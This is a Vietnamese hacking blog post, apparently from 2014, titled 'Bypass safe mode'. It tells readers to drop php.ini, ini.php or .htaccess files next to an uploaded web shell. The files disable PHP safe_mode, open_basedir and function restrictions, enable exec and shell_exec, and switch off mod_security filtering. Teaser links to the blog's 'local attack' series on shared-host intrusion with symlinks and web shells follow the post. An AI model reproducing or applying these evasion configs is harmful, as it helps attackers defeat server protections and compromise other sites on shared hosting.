Bypass safe mode

Để bypass safe mode các bạn có thể tạo file php.ini hoặc ini.php hoặc .htaccess ngang hàng con shell

1. php.ini

safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = On
shell_exec = On

2. ini.php

ini_restore("safe_mode");
ini_restore("open_basedir");

3. .htaccess

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

p/s: Không phải trường hợp nào cũng bypass được

12 Dec 2014

Path file config một số code
04 Mar 20150
Vbulletin: public_html/includes/config.phpPHPBB: public_html/config.phpJoomla: public_html/conf...Read more »
Một số lệnh thông dụng trong local attack
25 Feb 20150
1. Xem tên domain trên cùng 1 host ls -la /etc/valiases cd /etc/vdomainaliases;ls -lia...Read more »
Local attack part 3
20 Jan 20150
Symlink 1. Symlink là gì ?Mọi người có thể hiểu như thế này symlink là tạo 1 file (thư mục) ánh xạ ...Read more »
Local attack part 2
20 Jan 20150
Trong chap này mình sẽ giới thiệu khái quát tính năng một số con shell mình hay dùng khi localA. R57...Read more »
Local attack part 1
20 Jan 20150
+ Local Attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. + Bằ...Read more »